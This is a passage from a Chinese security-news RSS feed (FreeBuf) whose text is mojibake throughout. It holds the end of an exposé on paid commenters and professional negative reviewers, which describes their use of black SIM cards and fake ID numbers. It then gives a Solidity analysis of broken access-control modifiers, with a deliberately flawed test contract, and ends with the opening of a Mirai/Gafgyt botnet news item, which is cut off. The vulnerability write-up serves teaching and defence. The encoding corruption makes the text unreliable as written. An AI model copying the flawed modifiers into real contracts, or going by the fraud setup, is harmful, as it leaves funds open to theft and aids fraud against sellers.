168<p style="text-align: justify;">他们也曾网上冲浪,éšç€äº’è”网的è¿ä»£å˜è¿ï¼Œä»–们激战过天涯ã€çŒ«æ‰‘ã€è¥¿ç¥ 胡åŒï¼Œä¹Ÿæ›¾åœ¨åšå®¢ã€å¼€å¿ƒã€äººäººä¸ŠæŒ‡ç‚¹æ±Ÿå±±ï¼ŒåŽæ¥ä»–们转战微åšã€å¾®ä¿¡ã€ç”µå•†ã€‚</p>
169<p style="text-align: justify;">å¦‚ä»Šï¼Œä»–ä»¬å·²æ¸—é€æ•´ä¸ªäº’è”网世界,并且构建了一个庞大的黑色 “生æ€â€ã€‚</p>
170<p><img alt="æœªæ ‡é¢˜-11.jpg" src="http://image.3001.net/images/20180724/1532437088769.jpg!small" width="690" height="383"></p>
171<h2><strong>æ— æ‰€ä¸èƒ½â€œ<strong>五毛党</strong>â€</strong></h2>
172<p style="margin-left: 8px;">作为ä¸å›½äº’è”网的特色产物,èŒä¸šæˆ–åŠèŒä¸šçš„付费写手称为互è”网水军,而在这里é¢ï¼Œè§„æ¨¡æœ€ä¸ºåºžå¤§çš„è¦æ•°äº”毛党。 </p>
173<p style="margin-left: 8px;">“五毛党â€åœ¨å¹¿ä¹‰ä¸Šï¼Œå¤šæŒ‡äº’è”网当ä¸ï¼Œä¸ºäº†é’±è€Œå޻呿Ÿä¸ªå¸–,é˜è¿°æŸä¸ªè§‚点的人。åˆå› 为最早的å‘帖者除底薪外,æ¯å¸–按五毛钱æ¥åŠ è–ªï¼Œè¢«ç½‘æ°‘æˆç§°ä¸ºâ€œäº”毛党â€ã€‚他们ä¹äºŽä¸ºä»˜è´¹äººå£«åœ¨äº’è”ç½‘ä¸ŠçŒæ°´ï¼ŒåŒ…括å‘帖ã€è¯„论ã€ä¼ æ’æµè¨€æˆ–è€…å¸¦æœ‰æŒ‡å‘æ€§çš„舆论信æ¯ç‰ç‰ã€‚</p>
174<p style="margin-left: 8px;">åŠ æ‹¿å¤§ç»´å¤šåˆ©äºšå¤§å¦çš„ç ”ç©¶äººå‘˜æ›¾è”åˆåŒ—京大å¦çš„å¦è€…å…±åŒå‘布了一项å为《Undercover Researchers Expose Chinese Internet Water Army》的报告,直指ä¸å›½ç½‘络水军:</p>
175<p><img alt="375527419406251655848729.png" src="http://image.3001.net/images/20180724/15324373579452.png!small" width="294" height="507"></p>
176<p style="margin-left: 8px;">æŠ¥å‘Šä¸»è¦æœé›†äº†æ–°æµªã€æœç‹ä¸¤å®¶é—¨æˆ·ç½‘站的700个用户近20,000æ¡è¯„论数æ®ï¼Œå¹¶è¯•图区别“五毛党â€ä¸Žæ£å¸¸ç”¨æˆ·çš„区别。最终å‘现:</p>
177<p style="margin-left: 8px;">â€œäº”æ¯›å…šâ€æ›´å€¾å‘于å‘è¡¨æ–°çš„è¯„è®ºï¼Œè€Œä¸æ˜¯å¯¹å…¶å®ƒè¯„论进行回å¤ã€‚å…¶ä¸ï¼Œè¶…过50%的人会间隔2.5分钟就会å‘一个新帖。与普æ£å¸¸ç”¨æˆ·ç›¸æ¯”ï¼Œä»–ä»¬ä¼šæ›´å¿«åœ°ä»Žè®¨è®ºä¸æŠ½èº«è€Œå‡ºï¼Œå¹¶å°†ID弃而ä¸ç”¨ã€‚而且,他们æ¯ä¸ªäººå‘布的内容也有很大ä¸åŒï¼Œè¿™äº›äººå¤§å¤šé€šè¿‡å‰ªè´´æ–¹å¼ï¼Œåå¤å‘表相åŒå†…容。调查人员å‘现,在新浪,æœç‹ç½‘站上,相似评论内容的é‡å¤çŽ‡é«˜è¾¾88%。</p>
178<p><img alt="ea4bcbef76094b3605bedc79a3cc7cd98c109d59副本.jpg" src="http://image.3001.net/images/20180724/15324373842246.jpg!small" width="622" height="1200"></p>
179<p style="text-align: center;"><span style="color: rgb(159, 163, 168);">ç½‘ä¼ â€œäº”æ¯›å…šâ€å·¥èµ„清å•</span></p>
180<p style="margin-left: 8px;">而在“五毛党â€ä¸‹æ¸¸ï¼Œåˆæœ‰ä¼—å¤šåˆ†æ”¯ï¼ŒèƒŒåŽæ˜¯ä¸€æ¡ç”±æŽ¨æ‰‹ã€æžªæ‰‹ã€æ°´å†›ç»„æˆçš„庞大的利益链桅…</p>
181<p style="margin-left: 8px;">æ®æ–°åŽç¤¾æŠ¥ï¼Œ2017å¹´5月以æ¥ï¼Œä¸åŽäººæ°‘共和国公安部部署å„地公安机关开展打击“网络水军â€å…¨å›½é›†ç¾¤æˆ˜å½¹ï¼Œå·²ç ´èŽ·â€œç½‘ç»œæ°´å†›â€è¿æ³•犯罪案件40余起,涉案总金é¢ä¸Šäº¿å…ƒï¼ŒæŠ“èŽ·è¿æ³•犯罪嫌疑人200ä½™äººï¼ŒæŸ¥èŽ·å¹¶å…³åœæ¶‰å«Œéžæ³•炒作的网络账å·5000余个,关é—è¿æ³•è¿è§„网站上万个,涉åŠç½‘ä¸Šæ¶æ„ç‚’ä½œä¿¡æ¯æ•°åƒä¸‡æ¡ã€‚</p>
182<p style="margin-left: 8px;">然而,黑产世界何其之大,全国èŒä¸šæˆ–åŠèŒä¸šâ€œäº”毛党â€ä½•æ¢åƒä¸‡ï¼</p>
183<h2><strong>电商æ»ç©´â€œå·®è¯„师â€</strong><br /></h2>
184<p style="margin-left: 8px;">å¦‚æžœå°†â€œäº”æ¯›å…šâ€æ¯”作网络水军人海战术般的野路å,那么èŒä¸šå·®è¯„师就是网络水军ä¸çš„特ç§å…µã€‚3-5人编制的èŒä¸šå·®è¯„å¸ˆï¼Œå‡ å¤©ä¸‹æ¥ç”šè‡³å¯ä»¥æžåž®ä¸€å®¶ç½‘çº¢åº—ï¼ </p>
185<p><img alt="timg.jpeg" src="http://image.3001.net/images/20180724/15324374505772.jpeg!small" width="550" height="990"></p>
186<p style="text-align: center;"><span style="color: rgb(159, 163, 168);">èŒä¸šå·®è¯„师”æ“作æµç¨‹å›¾</span></p>
187<p style="text-align: justify;">与“五毛党â€ä¸åŒï¼Œä»–ä»¬çš„ä¸šåŠ¡æ›´åŠ ç²¾å‡†ï¼Œå°±æ˜¯å·®è¯„ã€‚å› ä¸ºåšçš„就是电商的生æ„,所以这次淘å®ä¸Šè‚¯å®šæ˜¯æ‰¾ä¸åˆ°ä»–们的身影。他们体é‡åºžå¤§ï¼Œèµ·æ¥éƒ½æ˜¯è§„模达2000人的QQ群……</p>
188<p><img alt="图片 1副本.jpg" src="http://image.3001.net/images/20180724/15324375065170.jpg!small" width="690" height="1200"></p>
189<p style="text-align: center;"><span style="color: rgb(159, 163, 168);">èŒä¸šå·®è¯„师“工作交æµç¾¤â€</span></p>
190<p style="text-align: justify;">与其他黑产群ä¸åŒï¼Œè¿™ä¸ªå‡ 乎ä¸è®¾é—¨æ§›ï¼Œå¾ˆå®¹æ˜“就混进3个2000人群。但当Magiccc准备干活时,傻了眼:</p>
191<p><img alt="WX20180724-074734@2x.png" src="http://image.3001.net/images/20180724/15324375392553.png!small" width="690" height="1200"></p>
192<p style="text-align: center;"><span style="color: rgb(159, 163, 168);">群内全员ç¦è¨€</span></p>
193<p style="text-align: justify;">å¯èƒ½æ˜¯å¯Ÿè§‰åˆ°äº†ä»€ä¹ˆï¼Œå…¶ä»–å‡ ä¸ªç¾¤éƒ½æ˜¯ç¦è¨€çжæ€ã€‚没办法,åªè¦å¦æ‰¾è·¯åï¼ŒåŠ äº†ä¸ªâ€œèŒæ–°ç¾¤â€ï¼Œå¦è¾Ÿè¹Šå¾„……</p>
194<p style="text-align: justify;">然而,没想到的是,这些群在临近æ£å¸¸ä¸Šçæ—下ç的点,开始活跃起楅…</p>
195<p style="text-align: center;"><img alt="201207124231342074794468 (1)副本.jpg" src="http://image.3001.net/images/20180724/15324376192077.jpg!small" width="300" height="787"><img alt="201207124231342074794468 (1).jpg" src="http://image.3001.net/images/20180724/15324375725872.jpg!small" width="300" height="377"></p>
196<p style="text-align: center;"><span style="color: rgb(159, 163, 168);">â€œèŒæ–°ç¾¤â€ä»¥è€å¸¦æ–°</span></p>
197<p style="text-align: justify;">æ ¹æ®ç»éªŒï¼Œè¿™ç¾¤äººæåˆ°çš„“肉â€åº”该是行业暗è¯ã€‚群主“english nameâ€åœ¨çº¿ä¸ºæ–°äººåšå¼•导,è¯è¯´50元的入会费真心ä¸è´µ……(相较æŸäº›é»‘äº§åŠ¨è¾„å‡ ç™¾ä¸Šåƒçš„费用,èŒä¸šå·®è¯„师的门槛算良心价)</p>
198<p style="text-align: justify;">èŒä¸šå·®è¯„师,把电商的店铺称为“肉â€ï¼Œä¸€èˆ¬éƒ½ä¼šé€‰æ‹©æ–°å¼€çš„网店,寻找网店å«â€œæ‰¾è‚‰åƒâ€ï¼Œæ–°å…¥è¡Œçš„差评师通过验è¯çš„æš—è¯é€šå¸¸ä¸ºâ€œæ±‚åƒè‚‰â€ã€‚在这个新人群里,群主表示这仅仅是一个准备群。</p>
199<p style="text-align: justify;">群主“english nameâ€åå¤è¡¨ç¤ºï¼Œâ€œä½ 们è¦ç”¨è„‘ï¼è¦ç”¨è„‘ï¼çœ‹çœ‹ç¾¤ç›¸å†Œé‡Œé¢çš„æµç¨‹å›¾ï¼Œåšå¥½å‡†å¤‡å†æ¥å«æˆ‘ï¼â€è€Œæ ¹æ®è¿™ä¸ªæµç¨‹å›¾æ¥çœ‹ï¼Œä¸€ä¸ªæ–°å…¥é—¨çš„“èŒä¸šå·®è¯„师â€é¦–å…ˆè¦å‡†å¤‡æ‰“猎用的“枪â€ï¼šä¸€ä¸ªä¸è®°å的手机å¡ï¼ˆé»‘å¡ï¼‰ã€ä¸€ä¸ªå‡çš„身份è¯ï¼ˆä¹Ÿèƒ½å¼„到真的),然åŽé€šè¿‡è¿™ä¸ªå‡çš„身份è¯ï¼ŒåŽ»æ·˜å®æ³¨å†Œæ”¯ä»˜å®å’Œè´¦æˆ·ã€‚</p>
200<p style="text-align: justify;">没有手机å¡ä¸è¦ç´§ï¼Œç¾¤ä¸»æé†’å…¥é—¨è€…åŽ»æŒ‡å®šæ¸ é“è´ä¹°ï¼›æ²¡æœ‰å‡èº«ä»½è¯ä¸è¦ç´§ï¼Œåªéœ€è¦åœ¨ç¾¤ä¸»å¤„缴纳50元的入门费,就å¯ä»¥å¾—到一串身份è¯å·ã€‚æœåŠ¡å¯è°“是细致入微,教å¦è´¨é‡å¯æƒ³è€ŒçŸ¥……</p>
201<p style="text-align: justify;">这群人都是昼ä¼å¤œå‡ºï¼Œèµ„深差评师一般都是å•干,当然å¶å°”ä¹Ÿä¼šå¸¦ç€æ–°äººâ€œåˆ·ä»»åŠ¡â€ã€‚</p>
202<p style="text-align: justify;">而这时候,å¦å¤–接任务的åƒäººç¾¤ä¹Ÿå¼€å§‹æ´»è·ƒèµ·æ¥ï¼š</p>
203<p><img alt="WechatIMG884.png" src="http://image.3001.net/images/20180724/15324376606316.png!small" width="690" height="1200"></p>
204<p style="text-align: center;"><span style="color: rgb(159, 163, 168);">业务群开始接å•</span></p>
205<p style="text-align: justify;">è€Œåœ¨ç™½å¤©ï¼Œæœ‰å‡ ä¸ªç¾¤ä¸»è¯•æŽ¢æ€§çš„æ‰¾åˆ°MagicccèŠäº†ä¸‹ï¼Œè¡Œæƒ…å·®ä¸å¤šåœ¨15元到20元之间,当然å¯èƒ½è¿˜æœ‰æ›´ä½Žçš„。</p>
206<p><img alt="图片 1.jpg" src="http://image.3001.net/images/20180724/15324377031661.jpg!small" width="490" height="1200"><img alt="13.png" src="http://image.3001.net/images/20180724/15324376836780.png!small" width="642" height="770"></p>
207<p style="text-align: center;">
208<p style="text-align: justify;">å¦å¤–ä¸€ä¸ªâ€œèŒæ–°ç¾¤â€ï¼ŒMagiccc很快跟一ä½èµ„æ·±èŒä¸šå·®è¯„师混熟,这ä½è€å¸ˆå‚…表示“æ¯å¤©æ™šä¸Š10点,他会通过YYè¯éŸ³ç‚¹å,11点æ£å¼å¼€å§‹å¸¦æ–°äººåƒè‚‰â€ã€‚åŽæ¥è·Ÿè€å¸ˆå‚…èŠå¼€äº†ï¼Œä»–表示,他们手上有éžå¸¸å¤šçš„åƒäººç¾¤ï¼Œçœ‹æˆ‘åŠå¤©æ²¡å›žæ¶ˆæ¯ï¼Œä»–还以为我ä¸ç›¸ä¿¡ï¼ˆåˆ«è¯´åƒäººç¾¤äº†ï¼Œä½ 就说是万人群我都信)……</p>
209<p style="text-align: justify;">è€å¸ˆè¿˜è¡¨ç¤ºï¼Œåœ¨åƒäººç¾¤é‡Œï¼Œè°ˆåˆ¤æ‰‹æŽ¥åˆ°é¡¹ç›®åŽï¼Œä¼šæŠŠé’±ç›´æŽ¥è½¬å…¥å¤§å®¶çš„æ‹å·æ”¯ä»˜å®ä¸ã€‚一å•15å…ƒï¼Œæ¯æ™šéšä¾¿æŽ¥ä¸ª10å•,就是150å…ƒï¼Œåƒæˆ‘è¿™æ ·çš„â€œèŒæ–°â€å…¥è¡Œæœˆå…¥4500å…ƒä¸æˆé—®é¢˜ï¼è€Œèµ„æ·±å·®è¯„å¸ˆï¼Œæ›´æ˜¯è½»æ¾æœˆæ”¶å…¥ä¸Šä¸‡……</p>
210<h2><strong>水深难防,电商平å°è‹¦ä¸å ªè¨€</strong></h2>
211<p style="text-align: justify;">我们都知é“ï¼Œæ·˜å®æžè¿‡èŒä¸šå·®è¯„师æ›å…‰å¹³å°ï¼Œä½†æ˜¯å› 为éšç§é—®é¢˜ï¼Œäº‰è®®ä¸æ–ï¼ŒåŽæ¥ä¹Ÿä¸äº†äº†ä¹‹ã€‚而这之åŽï¼Œè¿™ç¾¤äººæ›´åŠ æœ‰æƒæ— æï¼</p>
212<p style="text-align: center;"><img alt="12121212.jpg" src="http://image.3001.net/images/20180724/15324377485875.jpg!small" width="640" height="332"><span style="color: rgb(159, 163, 168);">曾ç»çš„差评师查询平å°</span></p>
213<p>而现在,电商平å°çš„å–家,åªèƒ½é€šè¿‡æ·˜æŸ¥æŸ¥ã€æŸ¥å°å·ç‰ä¸€äº›åœ¨çº¿ä»˜è´¹å¹³å°è¿›è¡Œä¹°å®¶ä¿¡èª‰åˆ†æŸ¥è¯¢ã€‚ç„¶åŽï¼Œé€šè¿‡è¿™äº›ä¿¡æ¯åˆ¤æ–买家身份,至于效果如何,就ä¸å¾—而知了。</p>
214<p><img alt="WechatIMG3454.jpeg" src="http://image.3001.net/images/20180724/1532437774444.jpeg!small" width="690" height="329"></p>
215<p style="text-align: center;"><span style="color: rgb(159, 163, 168);">第三方查询å‚考信æ¯</span></p>
216<p>å•从信誉级别æ¥çœ‹ï¼Œè¿™ä¸ªè¢«å°å·çš„èŒä¸šå·®è¯„师账å·å¯ä»¥è¯´éžå¸¸éšè”½ï¼Œ97.66%的好评率能够骗过ä¸å°‘电商å–家。</p>
217<p>Magiccc认为,这些网络水军所谓的利益链金å—塔尖,背åŽéƒ½æ˜¯å“ªäº›äººã€‚è¡Œä¸šçš„æ¶æ€§ç«žäº‰ï¼Œä¸€æ–¹é¢é€šè¿‡æ³•å¾‹ä¸¥åŠ ç®¡æŽ§ï¼Œçº¦æŸä¼ä¸šï¼Œå¦å¤–针对水军ä¸çš„â€œå›¢é•¿â€æˆ–“水æ¯â€è¿™ç±»ç®¡ç†äººå‘˜ï¼Œä¹Ÿéœ€è¦ä¸¥æ ¼æ‰“击。</p>
218<p><img alt="778787878787.png" src="http://image.3001.net/images/20180724/15324378022158.png!small" width="690" height="489"></p>
219<p>å¦å¤–一方é¢ï¼Œç›®å‰è¡Œä¸šç±»éžå¸¸å¤šçš„安全æœåŠ¡å•†ä¹Ÿå·²å…·å¤‡æˆç†Ÿçš„忬ºè¯ˆé£ŽæŽ§äº§å“以åŠè§£å†³æ–¹æ¡ˆã€‚基于海é‡ç”¨æˆ·æ•°æ®ï¼Œåˆ©ç”¨äººå·¥æ™ºèƒ½æŠ€æœ¯ï¼Œæå»ºè¡Œä¸ºæ¨¡åž‹å¹¶é€šè¿‡å›¢ä¼™å‘现,将业务安全风险扼æ€åœ¨æ‘‡ç¯®ä¸ï¼Œä»Žè€Œæå«ä¼ä¸šç½‘络资产,维护网络æ£å¸¸ç§©åºã€‚</p>
220<p><b style="color: rgb(159, 163, 168);">*本文作者:GEETESTæžéªŒï¼Œè½¬è½½è¯·æ³¨æ˜Žæ¥è‡ªFreeBuf.COM</b> </p>
221]]></content:encoded>
222 <wfw:commentRss>http://www.freebuf.com/articles/network/178669.html/feed</wfw:commentRss>
223 <slash:comments>16</slash:comments>
224 </item>
225 <item>
226 <title>修饰器(modifierï¼‰ç›¸å…³æ¼æ´žåˆ†æž</title>
227 <link>http://www.freebuf.com/vuls/178726.html</link>
228 <comments>http://www.freebuf.com/vuls/178726.html#comments</comments>
229 <pubDate>Thu, 26 Jul 2018 05:00:06 +0000</pubDate>
230 <dc:creator>BUGX</dc:creator>
231 <category><![CDATA[区å—链安全]]></category>
232 <category><![CDATA[æ¼æ´ž]]></category>
233 <category><![CDATA[modifier]]></category>
234 <category><![CDATA[修饰器]]></category>
235
236 <guid isPermaLink="false">http://www.freebuf.com/?p=178726</guid>
237 <description><![CDATA[一ã€å‰è¨€ 修饰器(modifier)å¯ä»¥æ”¹å˜å‡½æ•°çš„行为,例如作为å‰ç½®çš„æ£€æµ‹æ¡ä»¶ã€‚åŒæ—¶ä¿®é¥°å™¨å…·æœ‰å¯ç»§æ‰¿å±žæ€§ï¼Œå¯ä»¥ç”±æ´¾ç”Ÿåˆçº¦ä¸çš„定义覆盖。本次BUGX.IO区å—é“¾å®‰å…¨è¯¾å ‚ç»™å¤§å®¶è¿›è¡Œä¿®é¥°å™¨çš„ç›¸å…³æ¼æ´žåˆ†æžã€‚ 二ã€ä»€ä¹ˆæ˜¯ä¿®é¥°å™¨ 修饰器具有å¯ç»§æ‰¿å±žæ€§ï¼Œå¯ä»¥ç”±æ´¾ç”Ÿåˆçº¦ä¸çš„定义覆盖,如下示例代ç ,由于 onlyOwner 的修饰,给 foo å‡½æ•°åŠ äº†ä¸€ä¸ªå‰ç½®æ¡ä»¶ï¼Œå³åªæœ‰ owner æ‰èƒ½æˆåŠŸè°ƒç”¨æ¤å‡½æ•°ï¼Œå¦åˆ™å°±ä¼šæŠ¥é”™å›žæ»šã€‚其丠`_;` è¡¨ç¤ºå‡½æ•°ä¸çš„其余代ç 。 pragma solidity ^0.4.24; contract Foo {   address public owner;   constructor() public {       owner = msg.sender;   }   modifier onlyOwner() {       require(msg.sender == owner);       _;   }   function foo() onlyOwner public view returns(bool){       return true;   } } å¹¶ä¸”ï¼Œä¿®é¥°å™¨ä¹Ÿèƒ½å¸¦å…¥å‚æ•°ï¼Œå¦‚: modifier assertValueIsOne(uint value) {   assert(value == 1);   _; // original function goes at this point } function doSomething(uint value) assertValueIsOne(value) {   // do Something } 三ã€å¸¸è§ä¿®é¥°å™¨ 常è§çš„库åˆçº¦åŒ…括管ç†è€…æƒé™æŽ§åˆ¶åˆçº¦ã€æš‚åœåŠŸèƒ½åˆçº¦ã€é»‘åå•管ç†åˆçº¦ã€æ—¥å¿—记录ç‰ç‰ï¼Œè€Œå¸¸è§çš„修饰器有 onlyOwnerã€isOwnerã€whenNotPausedã€whenPausedã€managerã€executeã€onlyContractCreator ç‰ç‰ã€‚ å¸¸è§æƒé™æŽ§åˆ¶çš„修饰器写法有: modifier onlyOwner(){     if(msg.sender != owner){ throw;}     _; […]]]></description>
238 <content:encoded><![CDATA[<p><img alt="jhk-1532485926451.jpeg" src="http://image.3001.net/images/20180725/15325007614739.jpeg!small" width="690" height="459"></p>
239<h2><strong><b style=""><span style="color: rgb(51, 51, 51);">一ã€å‰è¨€</span></b></strong></h2>
240<p style="text-align: justify;"><span style="color: rgb(0, 176, 80);"><b>修饰器(modifier)å¯ä»¥æ”¹å˜å‡½æ•°çš„行为,例如作为å‰ç½®çš„æ£€æµ‹æ¡ä»¶ã€‚åŒæ—¶ä¿®é¥°å™¨å…·æœ‰å¯ç»§æ‰¿å±žæ€§ï¼Œå¯ä»¥ç”±æ´¾ç”Ÿåˆçº¦ä¸çš„定义覆盖。本次BUGX.IO区å—é“¾å®‰å…¨è¯¾å ‚ç»™å¤§å®¶è¿›è¡Œä¿®é¥°å™¨çš„ç›¸å…³æ¼æ´žåˆ†æžã€‚</b></span></p>
241<h2><b style=""><span style="color: rgb(51, 51, 51);">二ã€ä»€ä¹ˆæ˜¯ä¿®é¥°å™¨</span></b><br /></h2>
242<p style="text-align: justify;">修饰器具有å¯ç»§æ‰¿å±žæ€§ï¼Œå¯ä»¥ç”±æ´¾ç”Ÿåˆçº¦ä¸çš„定义覆盖,如下示例代ç ,由于 onlyOwner 的修饰,给 foo å‡½æ•°åŠ äº†ä¸€ä¸ªå‰ç½®æ¡ä»¶ï¼Œå³åªæœ‰ owner æ‰èƒ½æˆåŠŸè°ƒç”¨æ¤å‡½æ•°ï¼Œå¦åˆ™å°±ä¼šæŠ¥é”™å›žæ»šã€‚å…¶ä¸ <span style="color: rgb(206, 145, 120);">`_;`</span> 表示函数ä¸çš„其余代ç 。</p>
243</p>
244<pre><code>pragma solidity ^0.4.24;
245contract Foo {
246 address public owner;
247 constructor() public {
248 owner = msg.sender;
249 }
250 modifier onlyOwner() {
251 require(msg.sender == owner);
252 _;
253 }
254 function foo() onlyOwner public view returns(bool){
255 return true;
256 }
257}<br /></code></pre>
258</p>
259<p>å¹¶ä¸”ï¼Œä¿®é¥°å™¨ä¹Ÿèƒ½å¸¦å…¥å‚æ•°ï¼Œå¦‚:</p>
260</p>
261<pre><code>modifier assertValueIsOne(uint value) {
262 assert(value == 1);
263 _; // original function goes at this point
264}
265function doSomething(uint value) assertValueIsOne(value) {
266 // do Something
267}<br /></code></pre>
268</p>
269<h2><b style="color: rgb(51, 51, 51);">三ã€å¸¸è§ä¿®é¥°å™¨</b></h2>
270<p style="text-align: justify;">常è§çš„库åˆçº¦åŒ…括管ç†è€…æƒé™æŽ§åˆ¶åˆçº¦ã€æš‚åœåŠŸèƒ½åˆçº¦ã€é»‘åå•管ç†åˆçº¦ã€æ—¥å¿—记录ç‰ç‰ï¼Œè€Œå¸¸è§çš„修饰器有 onlyOwnerã€isOwnerã€whenNotPausedã€whenPausedã€managerã€executeã€onlyContractCreator ç‰ç‰ã€‚</p>
271<p style="text-align: justify;">å¸¸è§æƒé™æŽ§åˆ¶çš„修饰器写法有:</p>
272</p>
273<pre><code>modifier onlyOwner(){
274 if(msg.sender != owner){ throw;}
275 _;
276}
277modifier onlyOwner{
278 if(msg.sender != owner){
279 revert();
280 }else{
281 _;
282 }
283 }
284modifier onlyOwner() {
285 if(msg.sender != owner) revert();
286 _;
287}
288modifier onlyOwner() {
289 require(msg.sender == owner);
290 _;
291}
292modifier onlyOwner {
293 assert(msg.sender == owner);
294 _;
295}
296
297
298
299<br /></code></pre>
300<p>日志记录:</p>
301</p>
302<pre><code>event StartEvent();
303event FinishEvent();
304modifier logEvents {
305 StartEvent();
306 _;
307 FinishEvent();
308}
309function toggle () logEvents {
310}
311
312<br /></code></pre>
313<h2><b style=""><span style="color: rgb(51, 51, 51);">å››ã€å¸¸è§ä¿®é¥°å™¨æ¼æ´žç±»åž‹</span></b><br /></h2>
314<p><strong>1ã€Modifier Wrong Check 修饰器检测逻辑错误</strong></p>
315<p style="text-align: justify;">修饰器ä¸çš„判æ–é”™è¯¯ï¼Œå¯¼è‡´ä¿®é¥°å™¨æ— æ³•èµ·åˆ°å¼€å‘者预期的控制作用。</p>
316<p style="text-align: justify;">如 I_See_Voice_Token (ISVT) åˆçº¦ :</p>
317<p style="text-align: justify;"><a href="https://etherscan.io//address/0xa6b0412276b2484cfb370890b9d07e0c8f1f7684#code">https://etherscan.io//address/0xa6b0412276b2484cfb370890b9d07e0c8f1f7684#code</a> </p>
318</p>
319<pre><code>modifier onlyOwner() {
320 require(msg.sender != owner);
321 _;
322}<br /></code></pre>
323</p>
324<p style="text-align: justify;">
325<p style="text-align: justify;">æ£ç¡®çš„写法应该是 <span style="color: rgb(206, 145, 120);">`==`</span> ,结果错写æˆäº† <span style="color: rgb(206, 145, 120);">`!=`</span>,从é¢é€ æˆäº†æƒé™æŽ§åˆ¶å¤±æ•ˆã€‚</p>
326<p><strong>2ã€Modifier Invalid Check ä¿®é¥°å™¨æ£€æµ‹æ— æ•ˆæ¼æ´ž</strong></p>
327<p style="text-align: justify;">缺少使用 if〠if throwã€if revert()ã€requireã€assert 作为æ¡ä»¶åˆ¤æ–ï¼Œä½¿å¾—åˆ¤æ–æ— 效,导致修饰器的æƒé™æŽ§åˆ¶åŠŸèƒ½å¤±æ•ˆã€‚</p>
328<p style="text-align: justify;">如 BancorKiller åˆçº¦ :</p>
329<p style="text-align: justify;"><a href="https://etherscan.io//address/0x32a8c2da487ff26ef5778fd44dc8eaa73d7bb437#code">https://etherscan.io//address/0x32a8c2da487ff26ef5778fd44dc8eaa73d7bb437#code</a> </p>
330</p>
331<pre><code>modifier onlyAdmin() {
332 msg.sender == admin;
333 _;
334}<br /></code></pre>
335</p>
336<p style="text-align: justify;">
337<p style="text-align: justify;">
338<p style="text-align: justify;">使用以下代ç 进行测试,å¯ä»¥å‘现,任何人都å¯ä»¥è°ƒç”¨ foo_flaw 函数,æ£ç¡®å†™æ³•çš„ foo_right å‡½æ•°åˆ™åªæœ‰ç®¡ç†å‘˜æ‰å¯ä»¥è°ƒç”¨ã€‚</p>
339</p>
340<pre><code>pragma solidity ^0.4.24;
341contract foo {
342 address public admin;
343 constructor() public {
344 admin = msg.sender;
345 }
346 modifier onlyAdmin_flaw() {
347 msg.sender == admin;
348 _;
349 }
350 function foo_flaw() onlyAdmin_flaw public view returns(bool){
351 return true;
352 }
353
354 modifier onlyAdmin_right() {
355 require(msg.sender == admin);
356 _;
357 }
358 function foo_right() onlyAdmin_right public view returns(bool){
359 return true;
360 }
361}
362
363
364
365<br /></code></pre>
366<p><strong>3ã€æ›´å¤æ‚的情况带å‚ä¿®é¥°å™¨æ¼æ´ž</strong></p>
367<p style="text-align: justify;">ç”±äºŽä¿®é¥°å™¨èƒ½å¤Ÿå¸¦å‚æ‰§è¡Œï¼Œè¿™ç§ç±»åž‹çš„æ¼æ´žå°±åªèƒ½æŒ‰ç…§å®žé™…情况进行分æžã€‚</p>
368<h2><b style=""><span style="color: rgb(51, 51, 51);">五ã€ä¿®å¤æ–¹æ¡ˆ</span></b><br /></h2>
369<p style="text-align: justify;"> ä¸¥æ ¼éªŒè¯ä¿®é¥°å™¨çš„åˆ¤æ–æ¡ä»¶ï¼Œåˆçº¦å‘布åšå¥½å‰å……分的功能测试。</p>
370<h2><b style="">å…ã€å‚考资料</b></h2>
371<p style="text-align: justify;"> <a href="https://solidity.readthedocs.io/en/latest/contracts.html?highlight=modifier#function-modifiers">https://solidity.readthedocs.io/en/latest/contracts.html?highlight=modifier#function-modifiers</a> </p>
372<h2><b style="">七ã€å…¬å¸ä»‹ç»</b><br /></h2>
373<p style="text-align: justify;">BUGX.IO是一家致力于区å—链领域的安全公å¸ã€‚æ ¸å¿ƒå›¢é˜Ÿç»„å»ºäºŽ2014年,我们在区å—链生æ€å®‰å…¨ã€è¡Œä¸šè§£å†³æ–¹æ¡ˆã€å®‰å…¨å»ºè®¾ã€çº¢è“å¯¹æŠ—ç‰æ–¹é¢æœ‰æ·±åŽšç§¯ç´¯ä¸Žè¿‡ç¡¬ä¸“ä¸šç´ å…»ã€‚</p>
374<p style="text-align: justify;"><span style="color: rgb(159, 163, 168);"><b>*本文作者:BUGX.IO-Tri0nes,转载请注明æ¥è‡ªFreeBuf.COM</b></span></p>
375]]></content:encoded>
376 <wfw:commentRss>http://www.freebuf.com/vuls/178726.html/feed</wfw:commentRss>
377 <slash:comments>1</slash:comments>
378 </item>
379 <item>
380 <title>Miraiå’ŒGafgyt僵尸网络新å˜ç§è¿‘期å分活跃</title>
381 <link>http://www.freebuf.com/news/178824.html</link>
382 <comments>http://www.freebuf.com/news/178824.html#comments</comments>
383 <pubDate>Thu, 26 Jul 2018 02:53:12 +0000</pubDate>
384 <dc:creator>Alpha_h4ck</dc:creator>
385 <category><![CDATA[网络安全]]></category>
386 <category><![CDATA[资讯]]></category>
387 <category><![CDATA[Gafgyt]]></category>
388 <category><![CDATA[Miraiå˜ç§]]></category>
389 <category><![CDATA[僵尸网络]]></category>
390
391 <guid isPermaLink="false">http://www.freebuf.com/?p=178824</guid>
392 <description><![CDATA[安全专家è¦å‘Šç§°ï¼Œå¹¿å¤§ç”¨æˆ·è¿‘期应该å°å¿ƒMiraiå’ŒGafgytåƒµå°¸ç½‘ç»œäº†ï¼Œå› ä¸ºè¿™ä¸¤ä¸ªè‡åæ˜è‘—的物è”网僵尸网络åˆå¼€å§‹æ´»è·ƒäº†èµ·æ¥ã€‚ å®‰å…¨ä¸“å®¶é€šè¿‡ç ”ç©¶å‘现,Miraiå’ŒGafgyt这两个僵尸网络近期ååˆ†æ´»è·ƒï¼Œä¸æŽ’é™¤æ”»å‡»è€…è®¡åˆ’è¿›è¡Œæ–°ä¸€è½®å¤§è§„æ¨¡ç½‘ç»œæ”»å‡»çš„å¯èƒ½æ€§ã€‚由于Mirai僵尸网络的æºä»£ç æ¤å‰å·²æ³„露在网络上,紧跟ç€çš„就是å„ç§Miraiå˜ç§å¼€å§‹æ³›æ»¥äºŽâ€œæ±Ÿæ¹–â€ã€‚仅在2018年,就已ç»å‡ºçŽ°äº†ç±»ä¼¼Satoriã€Masutaã€WickedMirai〠JenXã€Omniå’ŒOMGç‰å¤šæ¬¾Mirai僵尸网络å˜ç§ã€‚ Gafgyt僵尸网络,åˆåBashlite或Lizkebab,该僵尸网络首次出现于2014年,其æºä»£ç 泄露于2015å¹´åˆã€‚æ ¹æ®Flashpointçš„ç 